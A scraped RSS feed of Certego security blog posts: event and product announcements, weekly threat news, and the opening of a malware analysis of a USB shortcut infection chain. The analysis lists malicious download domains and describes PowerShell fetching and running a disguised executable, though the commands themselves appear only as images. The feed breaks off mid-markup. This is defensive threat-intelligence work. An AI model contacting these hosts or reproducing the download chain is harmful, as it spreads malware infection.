&lt;p&gt;Con PanoptiCON2024 vogliamo creare una riflessione sul parallelismo applicabile al principio di antifragilità in natura e in azienda. Dal Labirinto della Masone, immersi in una foresta di canne di bambù, partiremo proprio dalle virtù di questa prodigiosa pianta che sferzata dal vento e della pioggia, si piega ma non si spezza, anzi, assorbe energia e la rigenera in bene comune: si modifica, cambia e torna più forte di prima.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Un sistema antifragile è quel sistema che subisce l’evento traumatico, lo fa proprio, e lo sfrutta per migliorare&lt;/strong&gt;. Abbraccia l’imprevisto, l’incertezza e ne assume positivamente il rischio. Questo principio di antifragilità è applicabile a qualsiasi ambito ed indica quindi l’attitudine a modificarsi e migliorare a fronte di sollecitazioni, fattori di stress, volatilità, disordine. Il labirinto ci è sembrato il luogo ideale dove sperimentare questi temi perchè rappresenta l’emblema universale della ricerca. Di fondo, parla della complessità del Mondo ed è una sorta di cammino anche all’interno di sé stessi, nello sforzo di superare ostacoli sempre maggiori, cambiare, accettare le richieste di cambiamento e migliorare attraverso l’apprendimento.&lt;/p&gt;
&lt;p&gt;Nella giornata del 4 giugno ascolteremo numerosi keynote speaker, viaggeremo nel labirinto complesso degli scenari attuali della cyber security con cyber guru e geopolitici, esploreremo il principio di antifragilità in natura con botanici, saggisti ed insieme agli analisti e i tecnici Certego scoveremo le risposte e le possibili vie d’uscita per rendere le nostre capacità aziendali più antifragili e adattabili.&lt;/p&gt;
&lt;p&gt;Le iscrizioni apriranno a breve e presto sarà disponibile l’agenda completa dell’evento.
Stay tuned!&lt;/p&gt;</content:encoded></item><item><title><![CDATA[State of cybersecurity - 2023 RECAP]]></title><description><![CDATA[Il report realizzato da Certego per AUSED che analizza i trend di sicurezza delle aziende italiane nel 2023]]></description><link>https://www.certego.net/blog/whitepaper-state-of-cybersecurity-2023-recap/</link><guid isPermaLink="false">whitepaper-state-of-cybersecurity-2023-recap</guid><category><![CDATA[Whitepaper]]></category><pubDate>Mon, 15 Apr 2024 22:00:00 GMT</pubDate><content:encoded>&lt;p&gt;State of Cybersecurity è la ricerca realizzata da Certego per AUSED, l’Associazione tra Utenti di Sistemi e Tecnologie dell’informazione che raccoglie oltre duecento aziende.&lt;/p&gt;
&lt;p&gt;L’obiettivo della ricerca, basata su un campione di 1.200.000 asset monitorati all’interno della piattaforma PanOptikon, è confrontare i volumi di attacco del 2023, con quelli del 2022. Il seguente report confronta tutto l&apos;anno 2023 con lo stesso periodo dell&apos;anno precedente.&lt;/p&gt;
&lt;p&gt;Gli incidenti sono diventati più pericolosi? Quali sono le superfici di attacco più a rischio? Quali sono i settori maggiormente esposti? Qual è il rapporto tra falsi positivi e incidenti reali?&lt;/p&gt;
&lt;p&gt;Sono alcune delle domande a cui rispondiamo all’interno del report.&lt;/p&gt;
&lt;p&gt;Compila il form e ricevi il PDF&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Weekly Highlights - April 5th]]></title><description><![CDATA[News and cybercrime updates selected by Certego]]></description><link>https://www.certego.net/blog/weekly-highlights-april-5/</link><guid isPermaLink="false">weekly-highlights-april-5</guid><category><![CDATA[Blog]]></category><pubDate>Thu, 04 Apr 2024 22:00:00 GMT</pubDate><content:encoded>&lt;h2&gt;ENISA publishes a study on ‘Best Practices for Cyber Crisis Management’ that assists in preparation for crisis management. The study was conducted for the EU Cyber Crisis Liaison Organisation Network (CyCLONe) and is now available publicly&lt;/h2&gt;
&lt;h3&gt;#European Union&lt;/h3&gt;
&lt;p&gt;This study aims to identify and collect information on future cybersecurity threats that could affect the Union’s infrastructure and services.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Explore details: &lt;a href=&quot;https://www.enisa.europa.eu/publications/enisa-foresight-cybersecurity-threats-for-2030&quot;&gt;read more&lt;/a&gt;
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;A new phishing-as-a-service (PhaaS) called “Darcula” is targeting victims worldwide.&lt;/h2&gt;
&lt;h3&gt;#Threat Actors&lt;/h3&gt;
&lt;p&gt;Chinese-language, phishing-as-a-service platform &quot;Darcula&quot; has created 19,000 phishing domains in cyberattacks against more than 100 countries.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Explore details: &lt;a href=&quot;https://www.darkreading.com/endpoint-security/-darcula-phishing-as-a-service-operation-bleeds-victims-worldwide?&amp;#x26;web_view=true&quot;&gt;read more&lt;/a&gt;
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;Finland Blames Chinese Hacking Group APT31 for Parliament Cyber Attack.&lt;/h2&gt;
&lt;h3&gt;#Threat Actors&lt;/h3&gt;
&lt;p&gt;The breach was first disclosed in December 2020, designed to penetrate the Parliament&apos;s information systems.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Explore details: &lt;a href=&quot;https://thehackernews.com/2024/03/finland-blames-chinese-hacking-group.html&quot;&gt;read more&lt;/a&gt;
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;The banking trojan known as Mispadu targets Europe, thousands of credentials compromised.&lt;/h2&gt;
&lt;h3&gt;#Threat Actors&lt;/h3&gt;
&lt;p&gt;Targets of the ongoing campaign include entities spanning finance, services, motor vehicle manufacturing, law firms, and commercial facilities.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Explore details: &lt;a href=&quot;https://thehackernews.com/2024/04/mispadu-trojan-targets-europe-thousands.html&quot;&gt;read more&lt;/a&gt;
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;/blockquote&gt;</content:encoded></item><item><title><![CDATA[Certego agli Honeynet Project Workshop 2024 di Copenhagen]]></title><link>https://www.certego.net/blog/certego-honeynet-project-workshop-copenhagen/</link><guid isPermaLink="false">certego-honeynet-project-workshop-copenhagen</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><dc:creator><![CDATA[Pier Giorgio Bergonzi, Product Marketing]]></dc:creator><pubDate>Mon, 01 Apr 2024 22:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Certego sarà tra i protagonisti dei workshop 2024 di The Honeynet Project, che si terranno dal 27 al 29 maggio a Copenhagen. &lt;a href=&quot;https://www.linkedin.com/in/matteo-lodi-90/&quot;&gt;Matteo Lodi&lt;/a&gt;, &lt;a href=&quot;https://www.linkedin.com/in/0ssigeno/&quot;&gt;Simone Berni&lt;/a&gt; e &lt;a href=&quot;https://www.linkedin.com/in/daniele-rosetti-9a1994197/&quot;&gt;Daniele Rosetti&lt;/a&gt; di Certego guideranno i partecipanti in un percorso pratico per esplorare IntelOwl, la piattaforma di Threat Intelligence di Certego. &lt;strong&gt;Mediante sessioni hands-on, verranno illustrate le potenzialità di IntelOwl nelle operazioni di analisi, classificazione e condivisione di dati di intelligence critici, con l&apos;obiettivo di ottimizzare e arricchire le procedure di lavoro degli analisti di cybersecurity&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://denmark2024.honeynet.org/&quot;&gt;The Honeynet Project Workshop 2024&lt;/a&gt; si posiziona come un summit di riferimento nell&apos;ambito della sicurezza informatica globale, focalizzato sui temi delle honeypot, deception e Cyber Threat Intelligence. I workshop in programma a Copenhagen mirano a creare un solido ponte di conoscenza e collaborazione tra gli esperti di sicurezza, offrendo un terreno fertile per lo scambio di esperienze e l&apos;approfondimento su strumenti avanzati, metodologie tattiche e le dinamiche sottostanti agli attacchi cybernetici.&lt;/p&gt;
&lt;p&gt;L&apos;impegno di Certego nel sostenere e partecipare a iniziative internazionali come the Honeynet Project riflette la nostra profonda convinzione che solo attraverso la collaborazione possiamo affrontare efficacemente le sfide della sicurezza informatica. Questo approccio collaborativo non solo amplia le nostre conoscenze e capacità, ma rafforza anche la comunità globale di sicurezza nel suo insieme, costruendo un ecosistema più resiliente contro le minacce cyber.
&lt;/br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;h2&gt;IntelOwl&lt;/h2&gt;
&lt;p&gt;IntelOwl è la piattaforma Open Source di Certego, integrata nativamente all’interno della piattaforma di Unified Security Operations PanOptikon®, che consente di  aggregare, classificare e condividere informazioni critiche, come gli indicatori di compromissione (IOC) e l&apos;analisi di diversi tipi di osservabili (quali IP, domini, hash e file completi), ma anche di facilitare e migliorare il lavoro degli analisti di sicurezza informatica.&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://www.certego.net/blog/intelowl-six-release/&quot;&gt;La nuova release di IntelOwl, rilasciata il 28 marzo 2024&lt;/a&gt;, apporta un significativo avanzamento con l&apos;integrazione del &lt;strong&gt;framework di indagine&lt;/strong&gt;. Questo strumento consente agli analisti di condurre indagini dettagliate su più indicatori specifici di compromissione e di collegarli tra loro, fornendo un quadro completo delle attività sospette. Grazie a questa funzionalità, gli analisti ora dispongono di una piattaforma unificata per l&apos;aggregazione, l&apos;analisi individuale e la correlazione degli indicatori, facilitando la costruzione di dettagliate mappe investigative.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Certego è la prima azienda italiana certificata Trusted Cloud Provider da Cloud Security Alliance]]></title><link>https://www.certego.net/blog/certego-unica-azienda-italiana-certificata-trusted-cloud-provider/</link><guid isPermaLink="false">certego-unica-azienda-italiana-certificata-trusted-cloud-provider</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><dc:creator><![CDATA[Pier Giorgio Bergonzi, Product Marketing]]></dc:creator><pubDate>Thu, 28 Mar 2024 23:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Certego è l&apos;&lt;strong&gt;unica azienda italiana ad aver ottenuto la certificazione di Trusted Cloud Provider rilasciata da Cloud Security Alliance (CSA)&lt;/strong&gt;, un riconoscimento che evidenzia la posizione di eccellenza dell&apos;azienda nel settore dei servizi gestiti di cybersecurity e il costante impegno nell&apos;adottare le migliori pratiche per rafforzare la postura di sicurezza dei propri clienti.&lt;/p&gt;
&lt;p&gt;Il programma Trusted Cloud Provider consente alle organizzazioni di dimostrare il loro impegno verso una sicurezza e servizi olistici come punto di riferimento per i clienti che cercano di identificare i fornitori di servizi basati sul cloud allineati con i loro requisiti di sicurezza.&lt;/p&gt;
&lt;p&gt;Per Certego, conseguire tale certificazione rappresenta non solo un traguardo significativo ma anche l&apos;assunzione di un impegno costante verso l&apos;eccellenza e l&apos;innovazione dei servizi erogati ai propri clienti. Ciò dimostra che &lt;strong&gt;Certego va oltre il semplice rispetto degli standard, attraverso l&apos;adozione delle tecnologie e delle pratiche di sicurezza più avanzate nell&apos;ambito dei servizi basati sul cloud&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;I clienti che scelgono i servizi di Certego possono pertanto riporre la loro fiducia in un partner che non solo dispone di competenze tecnologiche di spicco ma che dimostra anche un impegno costante nel migliorare la propria postura di sicurezza e quella dei propri clienti.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[IntelOwl v6 release]]></title><description><![CDATA[Complete Threat Intelligence Investigation Platform]]></description><link>https://www.certego.net/blog/intelowl-six-release/</link><guid isPermaLink="false">intelowl-six-release</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><dc:creator><![CDATA[Pier Giorgio Bergonzi, Product Marketing]]></dc:creator><pubDate>Wed, 27 Mar 2024 23:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Quando all’inizio del 2020 abbiamo dato vita al progetto IntelOwl, eravamo consapevoli delle sfide che la comunità di cyber security incontrava nell&apos;automatizzare le attività di routine quotidiane nell’ambito della Threat Intelligence. Il nostro obiettivo con IntelOwl era di rispondere a queste esigenze, sviluppando una piattaforma capace non solo di aggregare, classificare e condividere informazioni critiche, come gli indicatori di compromissione (IOC) e l&apos;analisi di diversi tipi di osservabili (quali IP, domini, hash e file completi), ma anche di facilitare e migliorare il lavoro degli analisti di sicurezza informatica.&lt;/p&gt;
&lt;p&gt;Nel corso degli anni, la versione open source di IntelOwl ha guadagnato un ampio consenso, testimoniato dalle oltre 3.000 &quot;stars&quot; sulla piattaforma GitHub, e ha continuato a evolversi, semplificando le operazioni giornaliere degli analisti.&lt;/p&gt;
&lt;p&gt;IntelOwl, nella sua versione più avanzata, è parte integrante dell’ecosistema Certego, e grazie all&apos;integrazione nativa con la piattaforma PanOptikon®, permette di raccogliere e condividere ogni tipo di informazioni critica, consentendo di migliorare ulteriormente l&apos;efficacia della nostra piattaforma MDR e velocizzare le attività di analisi e risposta agli incidenti del team di Security Operations di Certego.&lt;/p&gt;
&lt;p&gt;A quattro anni dal lancio, oggi la sesta release di IntelOwl rappresenta un punto di svolta cruciale per il software di Threat Intelligence di Certego. Dall’ultima release ad oggi abbiamo lavorato duramente per potenziare e trasformare IntelOwl da una piattaforma di Data Extraction ad una Investigation Platform.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;La nuova release di IntelOwl apporta un significativo avanzamento con l&apos;integrazione del framework di indagine. Questo strumento consente agli analisti di condurre indagini dettagliate su più indicatori specifici di compromissione e di collegarli tra loro, fornendo un quadro completo delle attività sospette. Grazie a questa funzionalità, gli analisti ora dispongono di una piattaforma unificata per l&apos;aggregazione, l&apos;analisi individuale e la correlazione degli indicatori, facilitando la costruzione di dettagliate mappe investigative&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1536px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/b72207567dec5e9c4b2b4f05e2581cee/be460/investigation-screen.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 59.114583333333336%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAIAAADtbgqsAAAACXBIWXMAAAsTAAALEwEAmpwYAAACAElEQVR42l2RS4/TMBSFb9NJaCZJm6R5OokTp3nTNmn6UFtmYKBCg1iwYMGaDQu2IMEGseEPA3+g3JRpkZA+WcfXvsfHNjjtXi1mj8JMjCsxLgdRjgg0BTf6jx5hCJCJVyUvb4p6dwDOojwtBJoLQd4PJpxNeTe+cphAYp4w3j1D4p5FwQzA9EEPeJL17Qj6ls/pFozGHUN9YHtKwCQvwlH2mexFshfiqPisb7gwMkA1EU43OXRRy2WwPeiznVHvEX22RUbVRkwX11l7ohODtBkkDRbFBEWNgqcl8EGu5IsLw6Id5q2cNVJa/wW1gv2TOR9WiMCmYoouzRUtAEwKOuFsJqWNVq2lbME5eL2QcxjndgJ0D8Z+B+7UyHU8dTcv3M1zkT0GwHvbUe+ExCrBS6TTsr890JtXGASMAJcAXU700JQkfZL0nBguVTTGTjEqR0WrliuM6qzvytfv5m/fa0UNuoNtl50dKP41WyFPJnIyNxdPrMXNuN6peaOwQvYDLXD7utMlx5PtUPAThHMZPHicmwesGpZLTDuqVoKf4iZjujJmG7PZS8n89M8URB0EFVQX8GEuV0KhZI2zfOq0t3j4ICyFIDPqLojd3sophvdkVn349PXz9x+zZ/ewvn9jVi1WHywwm+aeIPhUYNDz1O3hVCN+vf356/fxePz45dsfGrVR1Q1SpBAAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;PowerShell string&quot;
        title=&quot;&quot;
        src=&quot;/website/static/b72207567dec5e9c4b2b4f05e2581cee/71c1d/investigation-screen.png&quot;
        srcset=&quot;/website/static/b72207567dec5e9c4b2b4f05e2581cee/804b2/investigation-screen.png 384w,
/website/static/b72207567dec5e9c4b2b4f05e2581cee/e5715/investigation-screen.png 768w,
/website/static/b72207567dec5e9c4b2b4f05e2581cee/71c1d/investigation-screen.png 1536w,
/website/static/b72207567dec5e9c4b2b4f05e2581cee/be460/investigation-screen.png 1645w&quot;
        sizes=&quot;(max-width: 1536px) 100vw, 1536px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Con la sesta release, IntelOwl si afferma come il nucleo centrale per avviare indagini approfondite, consentendo agli analisti di documentare i risultati, correlare tra loro le informazioni scoperte e collaborare in maniera efficace. Questa funzionalità è cruciale per garantire una condivisione efficiente delle informazioni di intelligence, ottimizzando le risorse e massimizzando l&apos;efficacia complessiva delle operazioni di Detection e Incident Response. Inoltre, assicura che gli analisti ottengano informazioni strettamente rilevanti per i loro specifici contesti di sicurezza e scenari di minaccia, permettendo così un utilizzo più mirato e strategico delle risorse disponibili.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Malware Analysis]]></title><description><![CDATA[USB Malware Infection reloaded: the story of our UNC4990]]></description><link>https://www.certego.net/blog/malware-analysis-usb-infection-reloaded-the-story-of-our-unc/</link><guid isPermaLink="false">malware-analysis-usb-infection-reloaded-the-story-of-our-unc</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><pubDate>Thu, 21 Mar 2024 23:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Authors: Gabriele Pippi, Luca Testoni, Mayank Malik, Tommaso Palma, Matteo Ferrari, Federico Totaro, Marco Giovanetti.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Summary&lt;/strong&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;a href=&quot;#1-premesis&quot;&gt;Premises&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#2-Malware-Analysis-and-Triage-Report-RuntimeBroker.exe&quot;&gt;Malware Analysis and Triage Report: RuntimeBroker.exe&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;#executive-summary&quot;&gt;2.1 Executive Summary&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;#fingerprinting&quot;&gt;2.1.1 Fingerprinting&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#classification&quot;&gt;2.1.2 Classification&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#behavioral-summary&quot;&gt;2.1.3 Behavioral Summary&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;#static-analysis&quot;&gt;2.2 Static Analysis&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#dynamic-analysis&quot;&gt;2.3 Dynamic Analysis&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#3-iocs-indicator-of-compromises&quot;&gt;IOCs - Indicator of Compromises&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#4-variants&quot;&gt;Variants&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;#Variant-v.3&quot; title=&quot;july 11th 2023&quot;&gt;4.1 Variant v.3 (july 11th 2023)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#Variant-v.4&quot; title=&quot;september 4th 2023&quot;&gt;4.2 Variant v.4 (september 4th 2023)&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;1. Premises &lt;a id=&quot;1-premesis&quot;&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;This document contains the analysis about a Windows binary file found on several customers during the last year and from the PanOptikon platform. The alerts were about suspicious traffic generated from the machine after the users inserted and opened the USB key. First analysis revealed that the usb icon is a fake image. In reality, it is a &lt;em&gt;.lnk&lt;/em&gt; file (used in Windows as a shortcut used to open another file, folder, orapplication) containing a PowerShell string:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1390px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/7e79d2cb8e9320df9fee918db66859f0/f1c64/RuntimeBroker1.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 88.80208333333333%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAASCAIAAADUsmlHAAAACXBIWXMAABYlAAAWJQFJUiTwAAAC3ElEQVR42o1Ta2vcRhSdP9AWGtu7NtQQ0p/Rxq1DSmsoNCR24mddBzsh/y2f+rBDKNjZ3YQ0lH5p4s3azq5Xq9VajxnNaDQPaaXpleQFU/qhh6vDmXPvzB3EHSRjj2CfkDBNx2kJpbSUEsS4hNY6SRIQZUpVPggwUcSwEHEs5DjLjDF5npsJtE55LHWSgobiKpWkaVZWApDrejziSmtRwlwBNJFSQd9KQ8PKh82VRtAd7hDHMeccWF5FeRyY1blSSDUBJItrz89/VqvNzM3VIWZna/XZWqVBzMxM1erTc3Oz9XqtVpu+NvXp9MxUxR9/8tGNz6+j7a3Hm2sPt9b3ttYfra7sbK7tba4/At5Y3d14sLt2v0j9uAHZvdX7P927s3Hvzuby3a0fvn+ws/0EeUlrwF/Y/GdH/haa5/742Ujuj9R+kD3D+fORPLDoLxb7tV8yLB1xMIz3QdD8CJ0ny08bS0ftm38Obp2JpU707Rtr8Zh814m+eUdu/TW8fXh8s9n56vDdwu9/f/mmv/i6+3Wjs/BH/4uuWEHaHHn4ZcgboXgR60aSN0TSlGkzzZtj01DjJletOGlx3YpUC1JcNZlsqOwoMa/QhasipgNfEqxFnCtplCxYCiNjo4slcOEk2mhl0sRkaeEIMUZnvfMLL/C9ke9fEBKEIcbYBwZdRBgE2CPEDwKPUgI+50wpAcHjCL09dU4s0rXdYcD12Px/wNiikTO0rL5tDwOMIUJCCMaJ1uUYXY53NuFsoqE/jyhyHKeYIaWCMMIUgvshA8YsxoxXTsGFriIKo5hyQRlFg8HAdV1Caef0w/H7k7fH7e65ZTsX9gh+BYHP9XEVlR65foBDxkVIKbIsK4oimOx2u+04Q1LdnGDGqC6nuAgpL4WCkdZQTClljKF+v+95Hvzibq8Ht/BLwO7Ju/g3vAD7mJyendm2jXBZl5TvrnprWYn8P2FMb4R7ThD4PmP0H8PolduGE09IAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;PowerShell string&quot;
        title=&quot;&quot;
        src=&quot;/website/static/7e79d2cb8e9320df9fee918db66859f0/f1c64/RuntimeBroker1.png&quot;
        srcset=&quot;/website/static/7e79d2cb8e9320df9fee918db66859f0/804b2/RuntimeBroker1.png 384w,
/website/static/7e79d2cb8e9320df9fee918db66859f0/e5715/RuntimeBroker1.png 768w,
/website/static/7e79d2cb8e9320df9fee918db66859f0/f1c64/RuntimeBroker1.png 1390w&quot;
        sizes=&quot;(max-width: 1390px) 100vw, 1390px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;The PowerShell script, when launched, performs some network traffic, like some DNS queries and HTTP connections to some malicious urls reported below:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;eldi8.github.io&lt;/li&gt;
&lt;li&gt;wjecpujpanmwm.tk&lt;/li&gt;
&lt;li&gt;vimeo.com&lt;/li&gt;
&lt;li&gt;evinfeoptasw.dedyn.io&lt;/li&gt;
&lt;li&gt;cdn.discordapp.com&lt;/li&gt;
&lt;li&gt;bobsmith.apiworld.cf&lt;/li&gt;
&lt;li&gt;cdn.goodfilehosting.it&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1384px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/da0d5fa72c23e0dacb3b7c2868396893/0e904/RuntimeBroker2.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 23.177083333333336%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAIAAADKYVtkAAAACXBIWXMAABYlAAAWJQFJUiTwAAAA90lEQVR42jWMC0+DMBRG+f//xcRtMLcYje6Bg/GYEJ+AhbYwcbYbMKAMSLy6mJycnN7kq6TYGJj52dTdalTotLl6pBptoJfhERhb0dSJZROBh3oAvn5KF0FubHtJtmBM7v3DxEk0ImA2tsk5lgjGpWLhiRMr8IWbgOdBtsI1oOJaYnnFizqrTuCi6QH2H7noALjzYw3HfSnO/YcAJOODrYOdm5RmyN+/u5e0+Q3WPafiddc6tNC9dB18gU3ENO9zg/c+73zee6yXRnY8sumtd5DtWCXNHFXwVMlphspFJG7e+KWOBkY4MKOhiS8evDs/05J+RVuVtD/pjwUzyAmIwwAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;PowerShell string2&quot;
        title=&quot;&quot;
        src=&quot;/website/static/da0d5fa72c23e0dacb3b7c2868396893/0e904/RuntimeBroker2.png&quot;
        srcset=&quot;/website/static/da0d5fa72c23e0dacb3b7c2868396893/804b2/RuntimeBroker2.png 384w,
/website/static/da0d5fa72c23e0dacb3b7c2868396893/e5715/RuntimeBroker2.png 768w,
/website/static/da0d5fa72c23e0dacb3b7c2868396893/0e904/RuntimeBroker2.png 1384w&quot;
        sizes=&quot;(max-width: 1384px) 100vw, 1384px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;The resulting connections download and execute an executable called &lt;em&gt;“Runtime Broker.exe”&lt;/em&gt; in the following path:
&lt;em&gt;C:\Users\Victim\AppData\Local\Temp&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1380px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/42a7be9295acdbbadbd3ac9e37fe07a0/b1001/RuntimeBroker3.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 18.75%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAIAAAABPYjBAAAACXBIWXMAABYlAAAWJQFJUiTwAAAAq0lEQVR42j2ObQvCMAyE9///mx/FFxCV4QZbXXVbmrRpWs8JhnCQa3N5mhSJwyISRThuRbRy+JaqmtlPc85QvGIUkaQKp1mWWVS7wbnnNPn36CaOyUrNVqBRM8yVmHjbsBJYrJRaa0qp8d6/Ftodb/trf+78oXWPdxy5DqGMofazntrx0vu7W9Hw2+eaNGMZFA0CwAMSRBMRMyP23zgiMeIPKCFwQF+2y2b2AQAl5wUGlsCBAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Executable&quot;
        title=&quot;&quot;
        src=&quot;/website/static/42a7be9295acdbbadbd3ac9e37fe07a0/b1001/RuntimeBroker3.png&quot;
        srcset=&quot;/website/static/42a7be9295acdbbadbd3ac9e37fe07a0/804b2/RuntimeBroker3.png 384w,
/website/static/42a7be9295acdbbadbd3ac9e37fe07a0/e5715/RuntimeBroker3.png 768w,
/website/static/42a7be9295acdbbadbd3ac9e37fe07a0/b1001/RuntimeBroker3.png 1380w&quot;
        sizes=&quot;(max-width: 1380px) 100vw, 1380px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;The download of the malware could be reproduced using curl, removing the User-Agent value:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1386px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/e1bc10db1dabf585d46fc7dea21ca358/062c8/RuntimeBroker4.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
